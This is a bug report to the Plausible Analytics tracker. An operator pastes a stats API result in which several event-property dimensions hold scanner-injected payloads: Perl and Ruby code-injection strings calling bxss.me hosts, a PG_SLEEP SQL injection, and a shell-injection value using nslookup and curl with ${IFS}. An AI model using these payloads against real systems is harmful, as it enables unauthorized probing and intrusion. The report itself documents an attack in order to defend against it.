Injection/XSS

[tukao89]

Past Issues Searched

• I have searched open and closed issues to make sure that the bug has not yet been reported

Issue is a Bug Report

• This is a bug report and not a feature request, nor asking for self-hosted support

Using official Plausible Cloud hosting or self-hosting?

Plausible Cloud from plausible.io

Describe the bug

Some dimensions have injection/xss like bellow:

{"results":[{"metrics":[4923],"dimensions":["109"]},{"metrics":[4097],"dimensions":["111"]},{"metrics":[3112],"dimensions":["108"]},{"metrics":[2969],"dimensions":["112"]},{"metrics":[1819],"dimensions":["105"]},{"metrics":[657],"dimensions":["110"]},{"metrics":[332],"dimensions":["113"]},{"metrics":[64],"dimensions":["106"]},{"metrics":[11],"dimensions":["107"]},{"metrics":[3],"dimensions":["114"]},{"metrics":[1],"dimensions":["gethostbyname(lc('hitqx'.'hoenjnrdd1b5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(73).chr(114).chr(79)"]},{"metrics":[1],"dimensions":["'A'.concat(70-3).concat(224).concat(112).concat(85).concat(108).concat(66)+(require'socket'\nSocket.gethostbyname('hitod'+'syoyynsp3f5fc.bxss.me.')[3].to_s)"]},{"metrics":[1],"dimensions":["".gethostbyname(lc("hitzr"."ffqfstbs18699.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(77).chr(120).chr(89).""]},{"metrics":[1],"dimensions":[""+"A".concat(70-3).concat(224).concat(109).concat(90).concat(111).concat(73)+(require"socket"\nSocket.gethostbyname("hitjx"+"uwrcmxkj9227c.bxss.me.")[3].to_s)+""]},{"metrics":[1],"dimensions":[""+"A".concat(70-3).concat(224).concat(97).concat(72).concat(105).concat(69)+(require"socket"\nSocket.gethostbyname("hitev"+"ywtpdrfl4142e.bxss.me.")[3].to_s)+""]},{"metrics":[1],"dimensions":["gethostbyname(lc('hitzz'.'oquivqxn6b58d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(80).chr(118).chr(85)"]},{"metrics":[1],"dimensions":["'+'A'.concat(70-3).concat(224).concat(122).concat(90).concat(109).concat(66)+(require'socket'\nSocket.gethostbyname('hitry'+'zzsqipbed4f41.bxss.me.')[3].to_s)+'"]},{"metrics":[1],"dimensions":["'.gethostbyname(lc('hitev'.'vqxwaeqhaa934.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(68).chr(120).chr(82).'"]},{"metrics":[1],"dimensions":["'.gethostbyname(lc('hitae'.'bkknfooif3ba2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(75).chr(107).chr(77).'"]},{"metrics":[1],"dimensions":["24-1 OR 109=(SELECT 109 FROM PG_SLEEP(15))--"]},{"metrics":[1],"dimensions":["'+'A'.concat(70-3).concat(224).concat(111).concat(79).concat(98).concat(67)+(require'socket'\nSocket.gethostbyname('hittt'+'gqsrebmgf6247.bxss.me.')[3].to_s)+'"]},{"metrics":[1],"dimensions":["".gethostbyname(lc("hitlb"."tfmevbtnb408f.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(89).chr(107).chr(80).""]},{"metrics":[1],"dimensions":["gethostbyname(lc('hitit'.'krqtrzimf14f0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(88).chr(105).chr(73)"]},{"metrics":[1],"dimensions":["'A'.concat(70-3).concat(224).concat(110).concat(84).concat(118).concat(72)+(require'socket'\nSocket.gethostbyname('hitwg'+'zeixldmid3d5a.bxss.me.')[3].to_s)"]},{"metrics":[1],"dimensions":["&(nslookup${IFS}-q${IFS}cname${IFS}hitthgddryreo10949.bxss.me||curl${IFS}hitthgddryreo10949.bxss.me)&'\"0&(nslookup${IFS}-q${IFS}cname${IFS}hitthgddryreo10949.bxss.me||curl${IFS}hitthgddryreo10949.bxss.me)&'"]},{"metrics":[1],"dimensions":["'.gethostbyname(lc('hitaq'.'dbbsghkufdc30.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(115).chr(76).'"]},{"metrics":[1],"dimensions":[""+"A".concat(70-3).concat(22*4).concat(109).concat(82).concat(114).concat(75)+(require"socket"\nSocket.gethostbyname("hitqb"+"hkngxjjc021fa.bxss.me.")[3].to_s)+""]}],"meta":{},"query":{"site_id":"vneconomy.vn","metrics":["events"],"date_range":["2025-08-26T00:00:00+07:00","2025-11-27T23:59:59+07:00"],"filters":[["contains","event:props:aid",["114","113","112","111","110","109","108","107","106","105"]]],"dimensions":["event:props:aid"],"order_by":[["events","desc"]],"include":{},"pagination":{"offset":0,"limit":10000}}}

Expected behavior

How to prevent unwanted dimensions?

Screenshots

No response

Environment

- OS:
- Browser:
- Browser Version: